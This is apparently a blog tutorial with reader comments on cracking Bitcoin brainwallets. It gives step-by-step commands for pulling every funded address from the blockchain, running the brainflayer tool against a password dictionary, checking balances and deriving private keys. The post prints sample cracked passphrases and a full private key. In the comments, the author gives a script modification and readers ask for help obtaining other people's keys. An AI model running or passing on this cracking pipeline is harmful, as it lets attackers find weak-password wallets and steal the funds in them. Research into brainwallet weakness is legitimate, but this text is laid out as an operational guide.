Bitcoin Brainwallet Cracking Tools

Introduction:
New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets
http://www.coindesk.com/new-cracking-tool-exposes-major-flaw-in-bitcoin-brainwallets/

Download brainflayer: https://github.com/ryancdotorg/brainflayer

1. Password dictionary
Download CrackStation dictionary: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. Install Bitcoin Daemon: https://github.com/bitcoin/bitcoin

3. Open source blockchain tool Blockparser
Blockparser download: https://github.com/znort987/blockparser
Retrieve all Bitcoin addresses using Blockparser

./parser allBalances > allBalances.txt

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Convert Bitcoin address to Hash160 address
Tool written in Perl: http://lenschulwitz.com/base58
A slight change is needed to convert text file.

5. Convert Hash160 address to bloom filter address using hex2blf

hex2blf btcaddress.hex btcaddress.blf

6. Run brainflayer

brainflayer -b btcaddress.blf -i password.txt

7. Sample output: (first column is Bitcoin Hash160 address, the last column is the password)

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

long numeric passwords:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

long alphabet passwords:

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

passwords made of sentences

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

passwords in Chinese character

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Convert Hash160 address back to Bitcoin address
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Convert to bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49,
Brainwallet password is 1satoshi

9. Bitcoin wallet balance
check Bitcoin balance on Blockchain.info

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

10. Private key for the Bitcoin address
Download open source tool Addressgen: https://github.com/sarchar/addressgen

Example: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

Run

./genaddress.py -p 1satoshi

Output:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

As you can see above, the bitcoin address is 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
the private key is 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY

39 thoughts on “Bitcoin Brainwallet Cracking Tools

  • Monday July 25th, 2016 at 09:54
    Permalink

    i need a more in depth tutorial on how to do this step by step properly Thanks if you can send me one by email please

    Reply
  • Saturday July 30th, 2016 at 16:43
    Permalink

    Hi pal great tut dose this still work would love to give it a shot

    Reply
  • Thursday September 22nd, 2016 at 03:24
    Permalink

    Hi,

    Great article,!

    I have one problem though, at step 4, since i am not a developer, i am having a hard time figuring out what change to do to make it process a whole file. I am using a csv file which was generated by another blockparser (not znort’s) and it only outputs addresses in Base58.

    How could I convert them all in one go to hex format?

    Thanks in advance!

    Reply
    • Thursday September 22nd, 2016 at 15:46
      Permalink

      Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
      rename it to base58perl.pl

      replace the last part of the script from:

      #Sample test taken from https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses.
      my $base58_encoded_address = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM";
      print "\nRunning tests for bitcoin address $base58_encoded_address\n";
      print "Bitcoin address is valid.  Address type: '", check_bitcoin_address($base58_encoded_address), "'.\n";
      my $binary_address = decodebase58tohex($base58_encoded_address);
      print "Binary hexadecimal representation is: $binary_address\n";
      my $reencoded_base58 = encodebase58fromhex($binary_address);
      print "Re-encoded back to Base58 is: $reencoded_base58\n\n";

      to:

      my $fileSrc = 'base58.txt';
      open my $fhSrc, $fileSrc or die "Could not open $fileSrc: $!";
      
      my $fileDest = 'hex.txt';
      open(my $fhDest, '>>', $fileDest) or die "Could not open file $fileDest: $!";
      
      while( my $base58_encoded_address = <$fhSrc>)  {   
        my $binary_address = decodebase58tohex($base58_encoded_address);
        say $fhDest $binary_address;
      }
      
      close $fhSrc;
      close $fhDest;
      

      This should read base58 address from base58.txt and save the hex format address to hex.txt.

      Reply
      • Thursday September 22nd, 2016 at 15:54
        Permalink

        Awesome, it worked!

        Thank you!

        Reply
  • Sunday September 25th, 2016 at 17:18
    Permalink

    hopefully someone can make a full detail on how to make this work in linux.

    Reply
    • Sunday September 25th, 2016 at 17:19
      Permalink

      a tutorial i mean 🙂

      Reply
  • Wednesday November 9th, 2016 at 16:25
    Permalink

    how long does it take for you to get output from brainflayer? I have completed up to step #7 but now it appears brainflayer is either working in the background or doing nothing???

    I can make video tut if Jack doesn’t mind. I cant explain much of background processes as I usually compile and pack all data tightly and quickly to script it.

    Reply
    • Sunday November 13th, 2016 at 21:58
      Permalink

      use a known password for testing and you should see the output in one second.

      A video tutorial would be great. You can post the link here.

      Reply
    • Saturday January 21st, 2017 at 06:40
      Permalink

      Do you have an video tutorial, it where be great 😀

      Reply
  • Wednesday December 28th, 2016 at 01:05
    Permalink

    does it still work

    Reply
  • Friday January 20th, 2017 at 04:09
    Permalink

    Good day and keep up the good work. Please I omitted step 1 – 3 because I am trying to use my wallet ID to check how secured my wallet is but got stuck on step 4 to 5.
    Need Clarification on the following as a new be to programming:

    1. Do I need to follow the procedure you suggested on “Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
    rename it to base58perl.pl”
    2. If I am to do same after the modification, where do I upload the update?

    3. After the aforementioned steps, in what environment in github ( Is it “bitcoin command prompt” or “brain flayercommand prompt”), do I input the command “hex2blf btcaddress.hex btcaddress.blf” ?

    4. Also. will I replace btcaddress.hex with the hex value of my public key generated via http://lenschulwitz.com/base58

    Thank you as I await your esteemed clarification

    Reply
    • Tuesday January 24th, 2017 at 16:50
      Permalink

      1. Yes
      2. You upload the file to where the btcaddress.hex file is on. Then run the Perl script to convert addresses in btcaddress.hex to Hash160 format
      3. run the command “hex2blf” in Linux environment
      4. Yes, btcaddress.hex will be updated to Hash160 format

      Reply
  • Thursday January 26th, 2017 at 04:38
    Permalink

    Thanks so much for your valued feedback.
    Pls help clarify as I am new to programming and my background is Windows.
    1. Would all the downloads from step 1 to step 7 to mounted on Linux OS like Ubuntu, KDE etc or on github?
    2. Pls. under which tool will l locate btcaddress.hex?
    Apologies to bore you as I await your feedback.

    Reply
    • Tuesday February 7th, 2017 at 11:25
      Permalink

      1. all tools run on Linux OS
      2. you create the file btcaddress.hex at step 3

      Reply
  • Wednesday March 8th, 2017 at 16:52
    Permalink

    upon make request for brainflayer i recieve this error:

    gcc -O3 -flto -funsigned-char -falign-functions=16 -falign-loops=16 -falign-jumps=16 -Wall -Wextra -Wno-pointer-sign -Wno-sign-compare -pedantic -std=gnu99 -static brainflayer.o hex.o bloom.o mmapf.o hsearchf.o ec_pubkey_fast.o ripemd160_256.o dldummy.o algo/brainwalletio.o algo/warpwallet.o algo/keccak.o algo/sha3.o algo/brainv2.o secp256k1/.libs/libsecp256k1.a scrypt-jane/scrypt-jane.o -lssl -lrt -lcrypto -lz -lgmp -o brainflayer
    /usr/bin/ld: cannot find -lgmp
    collect2: error: ld returned 1 exit status
    Makefile:68: recipe for target ‘brainflayer’ failed
    make: *** [brainflayer] Error 1

    help please

    Reply
  • Saturday March 11th, 2017 at 18:19
    Permalink

    please which app did you use to run the program

    Reply
  • Thursday April 27th, 2017 at 07:08
    Permalink

    Hello pls i need a private key of someone how can i get that all the app that i download did not work pls help me out
    13Ugd1nDEgr9WPTZQVoxu4saqvwetkz7B4

    1J7R8Q2N22Skg9QPAEhW8wBR1jEA4bJPo8

    1H1jr23Vvc9iM575p8QqqM7RWjcaJRHZ6a
    thanks

    Reply
    • Friday May 5th, 2017 at 12:22
      Permalink

      This tool is not for the purpose of recovering the private key for a given bitcoin address.

      Reply
  • Wednesday May 3rd, 2017 at 03:16
    Permalink

    Hi Jack,

    I have tried every step in this tutorial (I stripped the 0 balance hashes out), but no luck so far.
    Could you provide a hash that i can put in my list that will definitely result in a match? My brainflayer has been running for quite some time, and there are 0 hits.

    Reply
  • Monday May 22nd, 2017 at 13:15
    Permalink

    How do I run any of these files on windows?
    To me these are just folders with random files I have no idea what to do with..
    Just a little help on that would be greatly appreciated!

    Thank You.

    Reply
    • Thursday June 22nd, 2017 at 22:29
      Permalink

      These tools run on Linux. I don’t have the Windows version.

      Reply
  • Tuesday May 23rd, 2017 at 02:44
    Permalink

    Hi Jack,
    I have a question when I run the last program you gave us I ge this error,
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 456, in
    main()
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 411, in main
    public_key, private_key = gen_key_pair()
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 94, in gen_key_pair
    if ssl_library.EC_KEY_generate_key(k) != 1:
    OSError: exception: access violation reading 0xFFFFFFFFD96E1A98
    I import the libeay32.dll both also for win64 also for win 32.
    How can I use this tool, ?

    Reply
  • Friday May 26th, 2017 at 20:54
    Permalink

    if you could make an offline step by step video all we will be very apreciated sir thanks for share your knoledge with us

    Reply
  • Thursday June 1st, 2017 at 00:01
    Permalink

    Hello.
    I have encrypted DOGE wallet.
    I convert encrypted address HERE : http://lenschulwitz.com/base58
    After make this command
    1):-Name:~/brainflayer$ ./hex2blf btcaddress.hex btcaddress.blf
    [*] Initializing bloom filter…
    [*] Loading hash160s from ‘btcaddress.hex’ 100.0%
    [*] Loaded 1 hashes, false positive rate: ~2.298e-167 (1 in ~4.351e+166)
    [*] Writing bloom filter to ‘btcaddress.blf’…
    [+] Success!
    r@r-System-Product-Name:~/brainflayer$

    and create password.txt.

    2)Then use –
    :Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt
    r@r-System-Product-Name:~/brainflayer$

    But output nothing.
    Whats wrong.?I should install doge daemon and parse doge blockchain??
    Very need help!

    Reply
  • Thursday June 1st, 2017 at 00:31
    Permalink

    seems it work,but no found password

    Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt -v -o r.txt
    rate: 382.29 p/s found: 0/7 elapsed: 0.018 s

    1E6B167A33CC29B7A3284499E5093E1F1DEDA7AE8C59C661A2 -hash
    password is 34os48trs
    passwordlist^
    4t4t4tr5
    45454545
    454545rt
    4r4r4r5t
    34os48trs
    34os48Trs
    349848trs

    What is wrong???

    Reply
  • Thursday June 1st, 2017 at 13:01
    Permalink

    Hello.
    I try now find my doge wallet password.Ubuntu 17.04
    But I not have install DOGE wallet like .dogecoin
    I just use address doge wallet on site http://lenschulwitz.com/base58 got hash from him and did btcaddress.blf .

    seems it work,but no found password
    Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt -v -o r.txt
    rate: 382.29 p/s found: 0/7 elapsed: 0.018 s
    1E6B167A33CC29B7A3284499E5093E1F1DEDA7AE8C59C661A2 -hash
    password is 34os48trs
    passwordlist^
    4t4t4tr5
    45454545
    454545rt
    4r4r4r5t
    34os48trs
    34os48Trs
    349848trs
    What is wrong???
    If you cannot help me or wont do it -let me know to my email .Thanx

    Reply
  • Thursday June 8th, 2017 at 03:08
    Permalink

    Can we use this on an addresd that has balance already. And we just want to find the private key as well as password? I assume it can be done by pasting the address in the txt file, and then carrying on the procedure?

    Reply
    • Thursday June 22nd, 2017 at 22:18
      Permalink

      No, this is not a tool to crack or generate private key for a given bitcoin address.

      Reply
  • Monday June 26th, 2017 at 13:00
    Permalink

    good day dear Jack
    great tool …
    so with this tool one could find brainpasswords and would be able to transfer out the funds?
    doesn’t it make it too easy for the evil-doers?
    thank you …

    Reply
  • Monday June 26th, 2017 at 18:36
    Permalink

    With this tool it’s possible to crack a brainwallet private key if you’re lucky. It’s a brute-force password cracking tool.

    This is why brainwallet.org permanently closed.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *